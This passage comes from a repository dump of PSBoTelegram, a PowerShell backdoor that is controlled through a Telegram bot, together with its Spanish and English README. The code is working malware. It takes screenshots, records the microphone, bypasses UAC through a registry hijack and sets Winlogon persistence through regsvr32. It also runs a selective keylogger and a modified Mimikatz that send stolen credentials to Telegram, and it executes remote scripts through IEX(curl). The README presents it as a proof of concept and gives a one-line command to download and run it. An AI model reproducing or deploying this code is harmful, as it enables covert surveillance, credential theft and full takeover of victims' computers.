$datos_ip_publica.city} ; $resultado | Select-Object IP, Pais, Ciudad} 112 | 113 | function bot-public {param($botkey) $getUpdatesLink = "https://api.telegram.org/bot$botkey/getUpdates" ; $Obtenemos_datos_actualizados = (invoke-WebRequest -Uri $getUpdatesLink -Method post).content ; $Obtenemos_datos_actualizados = $Obtenemos_datos_actualizados -split "," ; $chat_id = $Obtenemos_datos_actualizados | Select-String "chat"; $chat_id = $chat_id[0] -replace '"chat":{"id":' ; $chat_id_result = New-Object psobject -Property @{"chat_id"= $chat_id} ; $chat_id_result | Select-Object chat_id} 114 | 115 | function screen-shot {param ($botkey,$chat) 116 | 117 | $ruta = $env:USERPROFILE + "\AppData\Local\temp\1\" + "screenshot.png" 118 | 119 | Add-Type -AssemblyName System.Windows.Forms 120 | $resolucion = [System.Windows.Forms.Screen]::AllScreens | Select-Object bounds 121 | $resolucion = $resolucion -split (",") 122 | $ancho = $resolucion[2] -replace "width=" 123 | [string]$alto = $resolucion[3] -replace "height=" ; $alto = $alto -replace ".$" ; $alto = $alto -replace ".$" 124 | $ancho = [int]$ancho 125 | $alto = [int]$alto 126 | $horizontal = (Get-WmiObject -Class Win32_VideoController).CurrentHorizontalResolution 127 | $vertical = (Get-WmiObject -Class Win32_VideoController).CurrentVerticalResolution 128 | [Reflection.Assembly]::LoadWithPartialName("System.Drawing") 129 | $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, $ancho, $alto) 130 | 131 | function screenshot([Drawing.Rectangle]$bounds, $path) { 132 | $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height 133 | $graphics = [Drawing.Graphics]::FromImage($bmp) 134 | 135 | $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) 136 | 137 | $bmp.Save($path) 138 | 139 | $graphics.Dispose() 140 | $bmp.Dispose() 141 | } 142 | 143 | screenshot $bounds $ruta 144 | 145 | bot-send -photo $ruta -botkey $botkey -chat_id $chat_id 146 | 147 | } 148 | 149 | 150 | function graba-audio { param ($botkey,$chat_id,$segundos) 151 | IEX (curl "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1").content #### Grabar Audio 152 | $ruta = $env:USERPROFILE + "\AppData\Local\temp\1" 153 | $audio = $ruta + "\" + "audio.wav" 154 | if ( (Test-Path $ruta) -eq $false) {mkdir $ruta} else {} 155 | if ( (Test-Path $audio) -eq $true) {Remove-Item $audio} 156 | Get-MicrophoneAudio -Path $audio -Length $segundos -Alias "Secret" 157 | bot-send -file $audio -botkey $botkey -chat_id $chat_id 158 | } 159 | 160 | function crea_plantilla_sct {param ($code) 161 | $plantilla_sct = ' 162 | 163 | 169 | 174 | 175 | 176 | 177 | 178 | ' 179 | return $plantilla_sct} 180 | 181 | function BypassUAC-CyberVaca {param ([string]$comando) 182 | $ruta = $env:USERPROFILE + "\appdata\local\temp\1"; if ( (Test-Path $ruta) -eq $false) {mkdir $ruta} else {}; $ruta = $env:USERPROFILE + "\appdata\local\temp\1\temp.ps1" ; $comando | Out-File -Encoding ascii $ruta 183 | New-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile | Out-Null ; New-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile\shell | Out-Null ; New-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open | Out-Null ; New-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command | Out-Null 184 | $key = "registry::HKEY_CURRENT_USER\SOFTWARE\Classes\mscfile\shell\open\command" ; $modifica = "c:\Windows\system32\WindowsPowerShell\v1.0\powershell -executionpolicy bypass -file $ruta" ; set-item $Key $modifica 185 | Start-Process eventvwr.exe ; sleep -Seconds 3 186 | Remove-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command ; Remove-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\ ; Remove-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile\shell ; Remove-Item -Path registry::HKEY_CURRENT_USER\Software\Classes\mscfile ; sleep -Seconds 10; Remove-Item $ruta } 187 | 188 | 189 | function whoami_me { 190 | If (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) 191 | {[string]$privilegios = "Sin privilegios" } else {[string]$privilegios = "Privilegios Altos"}; $usuario = $env:USERNAME ; $dominio = $env:USERDOMAIN 192 | $Usuario = "Usuario: $usuario`n" ; $Dominio = "Dominio : $dominio`n" ; $Privilegios = "Privilegios : $privilegios`n"; return $usuario, $dominio, $privilegios 193 | } 194 | 195 | function mimigatoz { 196 | $ruta = $env:USERPROFILE + "\appdata\local\temp\1"; if ( (Test-Path $ruta) -eq $false) {mkdir $ruta} else {}; $ruta_temp = $env:USERPROFILE + "\appdata\local\temp\1" ; $ruta = $ruta + "\mimigatoz.txt" ; $ruta_ps1 = $ruta -replace ".txt", ".ps1" 197 | (wget https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/Funciones/Invoke-MimiGatoz.ps1).content | out-file $ruta_ps1 ; Set-Location $ruta_temp; ./mimigatoz.ps1 | Out-File $ruta ; cat $ruta 198 | bot-send -file $ruta -botkey $botkey -chat_id $chat_id 199 | Remove-Item $ruta_ps1 ; sleep -Seconds 5 ; Remove-Item $ruta 200 | } 201 | 202 | 203 | 204 | function persistence { 205 | If (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) 206 | {$texto = "Sorry, necesitas privilegios"; return $texto;break } else { 207 | $agent_bot = create_agent -botkey $botkey -chat_id $chat_id; $agent_bot = $agent_bot -replace "con bypassuac :D","" ; $code = code_a_base64 -code $agent_bot; $code = "powershell.exe -win hidden -enc " + $code 208 | $plantilla_sct = (crea_plantilla_sct -code $code); $plantilla_sct | Out-File -Encoding ascii "C:\Users\Public\Libraries\log2.sct" ; 209 | Set-ItemProperty "registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name Shell -value "explorer.exe, c:\windows\system32\regsvr32.exe /s /n /u /i:C:\Users\Public\Libraries\log2.sct scrobj.dll" 210 | $texto = "" ; $texto = "Persistencia ejecutada correctamente"} return $texto;break} 211 | 212 | 213 | 214 | function remove-persistence { 215 | If (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) 216 | {$texto = "Sorry, necesitas privilegios";return $texto; break } 217 | else { 218 | $key = "registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ;$check = Get-ItemProperty $key -name Shell | Select-String "regsvr32.exe" 219 | if ($check.count -eq 0) {$texto = "Todo correcto! parece estar limpio el arranque"; return $texto; break} else { 220 | $texto = "Eliminando persistencia" 221 | Set-ItemProperty "registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name Shell -value "explorer.exe" 222 | 223 | Remove-Item C:\Users\Public\Libraries\log2.sct; return $texto; break 224 | }}} 225 | 226 | function crea_keylogger { param ($extrae) 227 | $KeyLogger = ' 228 | function extrae_credenciales { 229 | $ErrorActionPreference = "SilentlyContinue" ; [string]$botkey = "your_token";[string]$chat_id = "your_chat_id" 230 | IEX (curl "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1").content ; $siempre = $true 231 | function credenciales_web {return (Get-Process MicrosoftEdgeCP,MicrosoftEdge,firefox,chrome,iexplore | Where-Object {$_.MainWindowTitle -like "*your_extrae*"}).id } 232 | do{ $ruta = $env:USERPROFILE + "\appdata\local\temp\1\" ; if ((Test-Path $ruta) -eq $false) {mkdir $ruta} ; $ruta = $ruta + "log.txt" ; $id = credenciales_web 233 | if ($id -ne $null ) { Get-Keystrokes -LogPath $ruta -Timeout 1 ; $siempre = $false; sleep -Seconds 30 } 234 | $datos = gc $ruta ; $datos = $datos | Select-String $Extrae ; $texto = $datos} while ($siempre -eq $true) $extraido = "" ; $i = 0 235 | foreach ($dato in $datos) { $i = $i + 1 236 | $dato = $dato -split "," ; $dato = $dato[0] ; $dato = $dato -replace ''""'',""; $dato = $dato -replace "TypedKey" ; $extraido += $dato -replace ''"'',"" 237 | if ($i -eq $datos.Count) {$texto = "Resultado KeyLogger-Selective para your_extrae `n";$extraido = $extraido -replace "2", "@" 238 | $texto += $extraido 239 | Invoke-Webrequest -uri "https://api.telegram.org/bot$botkey/sendMessage?chat_id=$chat_id&text=$texto" -Method post 240 | Remove-Item $ruta ;return $extraido}}} extrae_credenciales' ; $keylogger = $KeyLogger -replace "your_chat_id", $chat_id -replace "your_token" , $botkey -replace "your_extrae", $extrae ; return $KeyLogger} 241 | 242 | 243 | function mimikittenz { 244 | param($Activar) 245 | 246 | if ($Activar -like "on" ) {$Activar="Si"} ; if ($Activar -like "off") {$Activar="No"} 247 | $ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" 248 | $key = "UseLogonCredential" 249 | $check_exist_key = Test-Path $ruta_key 250 | if ($check_exist_key -eq $null) {$check_exist_key = "False"} 251 | $check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential 252 | if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "`n`nAñadida clave de registro, es necesario reiniciar." } 253 | if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key -Force | Out-Null ; "`n`nEliminada clave de registro, es necesario reiniciar."} 254 | } 255 | 256 | 257 | function test-command {param ($comando="",$botkey="",$chat_id="",$first_connect="") 258 | $help = "PSBoTelegram V0.8`n`nComandos disponibles :`n[*] /Help`n[*] /Info`n[*] /Shell`n[*] /whoami`n[*] /Ippublic`n[*] /Kill`n[*] /Scriptimport`n[*] /Shell nc (NETCAT)`n[*] /Download`n[*] /Screenshot`n[*] /Audio`n[*] /BypassUAC`n[*] /Persistence`n[*] /MimiGatoz`n[*] /KeyLogger_Selective" 259 | if ($comando -like "/Help") {$texto = $help; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 260 | if ($comando -like "Hola") {$texto = "Hola cabeshaa !! :D"; envia-mensaje -text $texto -botkey $botkey -chat $chat_id } 261 | if ($comando -like "/Info") {$texto = get-info | Out-String ;envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 262 | if ($comando -like "/Shell*" -and $first_connect -gt 5) {$comando = $comando -replace "/Shell ",""; if ($comando -like "dir" -or $comando -like "ls") {$comando = $comando + " -Name" }; if ($comando -like "nc*") {$powercat = (curl "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1").content -replace "function powercat","function nc" ; IEX $powercat } $texto = IEX $comando | Out-String; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 263 | if ($comando -like "/Whoami") {$texto = whoami_me;$texto = $texto -replace "@{","" -replace "}",""; $texto -replace "; ","`n" ; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 264 | if ($comando -like "/Ippublic") {$texto = public-ip -botkey $botkey | Format-List | Out-String; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 265 | if ($comando -like "/kill" -and $first_connect -gt 10) {$texto = "$env:COMPUTERNAME disconected"; envia-mensaje -text $texto -botkey $botkey -chat $chat_id; sleep -Seconds 2 ; $ruta = $env:USERPROFILE + "\appdata\local\temp\1"; Set-Location $ruta; del *.*; Set-Location $env:USERPROFILE ;exit} 266 | if ($comando -eq "/Scriptimport") {$texto = "/Scriptimport ejectuta script o comando powershell leyendo una archivo .txt desde una URL, Meterpreter, Empire...`nEjemplo: /scriptimport http://192.168.1.20/meterpreter.txt :D"; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 267 | if ($comando -like "/Scriptimport *") {$comando = $comando -replace "/scriptimport ","" ;$comando = IEX(curl $comando).content ;$texto = "Script Ejecutado desde $commando" ; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 268 | if ($comando -like "/Screenshot") {screen-shot -botkey $botkey -chat_id $chat_id } 269 | if ($comando -like "/Download*") {$file = $comando -replace "/Download ","" ; bot-send -file $file -botkey $botkey -chat_id $chat_id} 270 | if ($chat_id -eq $null -or $chat_id -eq "") {$chat_id = (bot-public).chat_id} 271 | if ($comando -like "/Audio*") {$segundos = $comando -replace "/Audio ","";graba-audio -botkey $botkey -chat_id $chat_id -segundos $segundos} 272 | if ($comando -like "/Bypassuac" -and $first_connect -gt 5) {$texto = "Ejecutado el BypassUAC, espere la nueva conexion del BOT";envia-mensaje -text $texto -botkey $botkey -chat $chat_id; $id = (Get-Process powershell).Id;$agent_bot = create_agent -botkey $botkey -chat_id $chat_id; BypassUAC-CyberVaca -comando $agent_bot ; Stop-Process -id $id} 273 | if ($comando -like "/Persistence") {$texto = "La funcion de persistencia se ejecuta: `n /Persistence On`n /Persistence Off"; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 274 | if ($comando -like "/Persistence On") {$texto = persistence; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 275 | if ($comando -like "/Persistence Off") {$texto = remove-persistence; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 276 | if ($comando -eq "/KeyLogger_Selective") {$texto = "Activa un KeyLogger de manera selectiva.`n Ejemplo: /KeyLogger_Selective facebook"; envia-mensaje -text $texto -botkey $botkey -chat $chat_id} 277 | if ($comando -like "/KeyLogger_Selective *") {$comando = $comando -replace "/KeyLogger_Selective ",""; $code = crea_keylogger -extrae $comando ; $code = code_a_base64 -code $code; $code = "powershell.exe -win hidden -enc " + $code ; $plantilla_sct = (crea_plantilla_sct -code $code); $plantilla_sct | Out-File -Encoding ascii "C:\windows\system32\log.sct" ; IEX 'c:\windows\system32\regsvr32.exe /s /n /u /i:c:\windows\system32\log.sct scrobj.dll' ;$texto = "Lanzado Keylogger_Selective $comando" ; envia-mensaje -text $texto -botkey $botkey -chat $chat_id; sleep -Seconds 10 ; Remove-Item C:\Windows\System32\log.sct} 278 | if ($comando -like "/MimiGatoz") {mimigatoz} 279 | # if ($comando -eq "Mimikittenz") {$texto = "La funcion mimikitenz se ejecuta: `n /Mimikittenz On`n /Mimikittenz Off"} 280 | if ($comando -eq "Mimikittenz") {$texto = "Proximamente.."; envia-mensaje -text $texto -botkey $botkey -chat $chat_id } 281 | } -------------------------------------------------------------------------------- /PSBoTelegram.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/6b0de8fdda4276cc9d0acaa35e67bf5717b302c3/PSBoTelegram.ps1 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # PsBoTelegram 4 | Backdoor using Telegram and Powershell. Por favor, usad sólo vuestros equipos para las pruebas. 5 | No me hago responsable de un mal uso del software. Rercordad que esto sólo es una prueba de concepto. 6 | 7 | Podeis probar el script abriendo una consola de powershell y ejecutando este comando: 8 | 9 | **IEX (curl "https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1" ).content**   10 | 11 | ____ _____ ____ ______ __ 12 | / __ \/ ___// __ )____/_ __/__ / /__ ____ __________ _____ __ 13 | / /_/ /\__ \/ __ / __ \/ / / _ \/ / _ \/ __ / ___/ __ / __ __ \ 14 | / ____/___/ / /_/ / /_/ / / / __/ / __/ /_/ / / / /_/ / / / / / / 15 | /_/ /____/_____/\____/_/ \___/_/\___/\__, /_/ \__,_/_/ /_/ /_/ 16 | /____/ 17 | 18 | v0.8 by CyberVaca @ HackPlayers 19 | 20 | PSBotTelegram es un script escrito en Powershell, que nos crea una backdoor que se conecta a un BOT de Telegram. El BOT se controlará por mensajes de Telegram. Al ejecutar el script nos va a pedir tres datos necesarios para crear el shellcode. 21 | 22 | # Instalación en Linux 23 | 24 | git clone https://github.com/hackplayers/psbotelegram.git 25 | cd psbotelegram 26 | sudo apt-get update > /dev/null 27 | sudo apt-get install libunwind8 libicu55 28 | wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb 29 | sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb 30 | powershell ./PSBoTelegram.ps1 31 | 32 | # Instalación en Windows 33 | 34 | Powershell.exe ./PSBotelegram.ps1 35 | 36 | Los datos que nos pide son los siguientes: 37 | 38 | # Parametros 39 | ![Parametros](./images/parametros.png) 40 | 41 | **[+] Introduzca el Token del Bot de Telegram:** "Aquí deberemos poner el Token del bot que hayamos creado." 42 | **[+] Introduzca su Chat ID:** "Aquí deberemos poner nuestro ID de Telegram." 43 | **[+] Introduzca el delay para la conexión:** "En este campo seteamos el delay(retardo) entre en pc con el backdoor y nuestro chat de telegram" 44 | 45 | # Salidas de archivo: 46 | ![Salidas](./images/OutFiles.png) 47 | 48 | Una vez introducido estos datos, nos creará un shellcode en BASE64 en un tipo de archivo seleccionado para ejecutarlo en el equipo a auditar. 49 | 50 | # Funciones del backdoor. 51 | 52 | [1]   **/Help**   (Nos muestra la ayuda) 53 | [2]   **/Info**   (Devuelve información sobre el equipo) 54 | [3]   **/Shell**   (/Shell + CmdLet a ejecutar ) 55 | [4]   **/Whoami**   (Devuelve el usuario que ejecutó el codigo) 56 | [5]   **/Ippublic**   (Nos da IP publica, Pais y Ciudad del Target) 57 | [6]   **/Kill**   (Mata el backdoor) 58 | [7]   **/Scriptimport**   (Importa el script de powershell pasandole una url) 59 | [8]   **/Shell nc (netcat)**   (Función de powercat https://github.com/besimorhino/powercat 60 | ) 61 | [9]   **/Download**   (Download mas ruta nos descarga el archivo) 62 | [10]  **/Screenshot**   (Realiza screenshot y nos lo envia) 63 | [11]  **/Audio**   (/Audio X, Grabaría X segundos de audio y nos lo envia) 64 | [12]  **/BypassUAC**   (Ejecuta el Bot con privilegios administrativos) 65 | [13]  **/Persistence**   (/Persistence ON/OFF) 66 | [14]  **/MimiGatoz**   (Ejecuta Mimikatz modificado para el bypass AV y nos envia los datos) 67 | [15]  **/Keylogger-Selective**   (Ejecuta un Keylogger selectivo, ejemplo /keylogger-Selective Facebook) 68 | [16]  **/Mimikittenz**   (Ejecuta Mimikittenz, comprobando si el equipo es vulnerable y si no lo es, lo hace vulnerable... ) 69 | 70 | 71 | # PsBoTelegram English 72 | Backdoor using Telegram and Powershell. Please use only your test equipment. 73 | I am not responsible for any misuse of the software. Make sure this is only a proof of concept. 74 | 75 | You can test the script by opening a powershell console and running this command: 76 | 77 | **IEX (curl "https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1" ).content**   78 | 79 | 80 | ____ _____ ____ ______ __ 81 | / __ \/ ___// __ )____/_ __/__ / /__ ____ __________ _____ __ 82 | / /_/ /\__ \/ __ / __ \/ / / _ \/ / _ \/ __ / ___/ __ / __ __ \ 83 | / ____/___/ / /_/ / /_/ / / / __/ / __/ /_/ / / / /_/ / / / / / / 84 | /_/ /____/_____/\____/_/ \___/_/\___/\__, /_/ \__,_/_/ /_/ /_/ 85 | /____/ 86 | 87 | v0.8 by CyberVaca @ HackPlayers 88 | 89 | PSBotTelegram is a script written in Powershell, which creates a backdoor that connects to a Telegram BOT. The BOT will be controlled by Telegram messages. When executing the script we will ask for three data needed to create the shellcode. 90 | 91 | # Install in Linux 92 | 93 | git clone https://github.com/hackplayers/psbotelegram.git 94 | cd psbotelegram 95 | sudo apt-get update > /dev/null 96 | sudo apt-get install libunwind8 libicu55 97 | wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb 98 | sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb 99 | powershell ./PSBoTelegram.ps1 100 | 101 | # Install in Windows 102 | 103 | Powershell.exe ./PSBotelegram.ps1 104 | 105 | The data that asks us are the following: 106 | 107 | # Parametres 108 | ![Parametros](./images/parametros.png) 109 | 110 | **[+] Enter the Telegram Bot Token:** "Here we have to put the Token of the bot we have created." 111 | **[+] Enter your Chat ID:** "Here we have to put our Telegram ID." 112 | **[+] Enter the delay for the connection:** "In this field we set the delay between pc in the backdoor and our telegram chat" 113 | 114 | # Backdoor functions 115 | 116 | [1]   **/Help** (Show us the help) 117 | [2]   **/Info** (Returns information about the equipment) 118 | [3]   **/Shell** (/ Shell + CmdLet to run) 119 | [4]   **/Whoami** (Returns the user who ran the code) 120 | [5]   **/Ippublic** (We give IP publica, Country and Target City) 121 | [6]   **/Kill** (Kill the backdoor) 122 | [7]   **/Scriptimport** (Import the powershell script by passing it a url) 123 | [8]   **/Shell nc (netcat)** (Powercat function https://github.com/besimorhino/powercat) 124 | [9]   **/Download** (Download more path to download the file) 125 | [10]   **/Screenshot** (Make screenshot and send it to us) 126 | [11]   **/Audio** (/Audio X, Record X seconds of audio and send it to us) 127 | [12]   **/BypassUAC** (Runs the bot with administrative privileges) 128 | [13]   **/Persistence** (/ Persistence ON / OFF) 129 | [14]   **/MimiGatoz** (Run modified Mimikatz for AV bypass and send us the data) 130 | [15]   **/Keylogger-Selective** (Executes a Selective Keylogger, example /keylogger-Selective Facebook) 131 | [16]   **/Mimikittenz** (Mimikittenz runs, checking if the computer is vulnerable and if it is not, it makes it vulnerable ...) 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /images/OutFiles.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/6b0de8fdda4276cc9d0acaa35e67bf5717b302c3/images/OutFiles.png -------------------------------------------------------------------------------- /images/parametros.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/6b0de8fdda4276cc9d0acaa35e67bf5717b302c3/images/parametros.png --------------------------------------------------------------------------------